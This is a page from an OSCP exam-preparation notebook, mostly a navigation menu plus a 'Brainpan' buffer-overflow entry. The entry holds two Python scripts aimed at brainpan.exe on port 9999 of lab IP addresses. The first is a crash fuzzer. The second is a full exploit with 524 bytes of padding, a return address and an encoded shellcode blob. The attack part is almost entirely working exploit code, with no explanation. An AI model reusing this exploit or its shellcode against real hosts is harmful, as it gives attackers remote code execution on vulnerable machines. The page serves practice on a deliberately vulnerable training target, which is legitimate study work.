OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page
  • !/usr/bin/python
  • !/usr/bin/python

Was this helpful?

  1. Buffer Overflow
  2. Buffer overflow Step by Step

Brainpan

!/usr/bin/python

import socket,sys

payload = "A" * 1000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect(('192.168.228.140',9999)) # IP of WinXP SP3 machine running brainpan.exe except: print "[-] Connection failed! Noob!" sys.exit(0)

s.recv(1024) s.send(payload)

==========================================

!/usr/bin/python

import socket,sys

shellcode = "" shellcode += "\xda\xc0\xba\x2c\xaf\xfd\xb9\xd9\x74\x24\xf4\x58" shellcode += "\x33\xc9\xb1\x52\x31\x50\x17\x83\xe8\xfc\x03\x7c" shellcode += "\xbc\x1f\x4c\x80\x2a\x5d\xaf\x78\xab\x02\x39\x9d" shellcode += "\x9a\x02\x5d\xd6\x8d\xb2\x15\xba\x21\x38\x7b\x2e" shellcode += "\xb1\x4c\x54\x41\x72\xfa\x82\x6c\x83\x57\xf6\xef" shellcode += "\x07\xaa\x2b\xcf\x36\x65\x3e\x0e\x7e\x98\xb3\x42" shellcode += "\xd7\xd6\x66\x72\x5c\xa2\xba\xf9\x2e\x22\xbb\x1e" shellcode += "\xe6\x45\xea\xb1\x7c\x1c\x2c\x30\x50\x14\x65\x2a" shellcode += "\xb5\x11\x3f\xc1\x0d\xed\xbe\x03\x5c\x0e\x6c\x6a" shellcode += "\x50\xfd\x6c\xab\x57\x1e\x1b\xc5\xab\xa3\x1c\x12" shellcode += "\xd1\x7f\xa8\x80\x71\x0b\x0a\x6c\x83\xd8\xcd\xe7" shellcode += "\x8f\x95\x9a\xaf\x93\x28\x4e\xc4\xa8\xa1\x71\x0a" shellcode += "\x39\xf1\x55\x8e\x61\xa1\xf4\x97\xcf\x04\x08\xc7" shellcode += "\xaf\xf9\xac\x8c\x42\xed\xdc\xcf\x0a\xc2\xec\xef" shellcode += "\xca\x4c\x66\x9c\xf8\xd3\xdc\x0a\xb1\x9c\xfa\xcd" shellcode += "\xb6\xb6\xbb\x41\x49\x39\xbc\x48\x8e\x6d\xec\xe2" shellcode += "\x27\x0e\x67\xf2\xc8\xdb\x28\xa2\x66\xb4\x88\x12" shellcode += "\xc7\x64\x61\x78\xc8\x5b\x91\x83\x02\xf4\x38\x7e" shellcode += "\xc5\x3b\x14\x64\xc2\xd4\x67\x64\xfc\x78\xe1\x82" shellcode += "\x94\x90\xa7\x1d\x01\x08\xe2\xd5\xb0\xd5\x38\x90" shellcode += "\xf3\x5e\xcf\x65\xbd\x96\xba\x75\x2a\x57\xf1\x27" shellcode += "\xfd\x68\x2f\x4f\x61\xfa\xb4\x8f\xec\xe7\x62\xd8" shellcode += "\xb9\xd6\x7a\x8c\x57\x40\xd5\xb2\xa5\x14\x1e\x76" shellcode += "\x72\xe5\xa1\x77\xf7\x51\x86\x67\xc1\x5a\x82\xd3" shellcode += "\x9d\x0c\x5c\x8d\x5b\xe7\x2e\x67\x32\x54\xf9\xef" shellcode += "\xc3\x96\x3a\x69\xcc\xf2\xcc\x95\x7d\xab\x88\xaa" shellcode += "\xb2\x3b\x1d\xd3\xae\xdb\xe2\x0e\x6b\xeb\xa8\x12" shellcode += "\xda\x64\x75\xc7\x5e\xe9\x86\x32\x9c\x14\x05\xb6" shellcode += "\x5d\xe3\x15\xb3\x58\xaf\x91\x28\x11\xa0\x77\x4e" shellcode += "\x86\xc1\x5d"

payload = "A" 524 + "\xf3\x12\x17\x31" + "C"12 + shellcode s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect(('192.168.228.141',9999)) # IP of WinXP SP3 machine running brainpan.exe except: print "[-] Connection failed! Noob!" sys.exit(0)

s.recv(1024) s.send(payload)

PreviousStudy about buffer overflowNextVulnServer

Last updated 5 years ago

Was this helpful?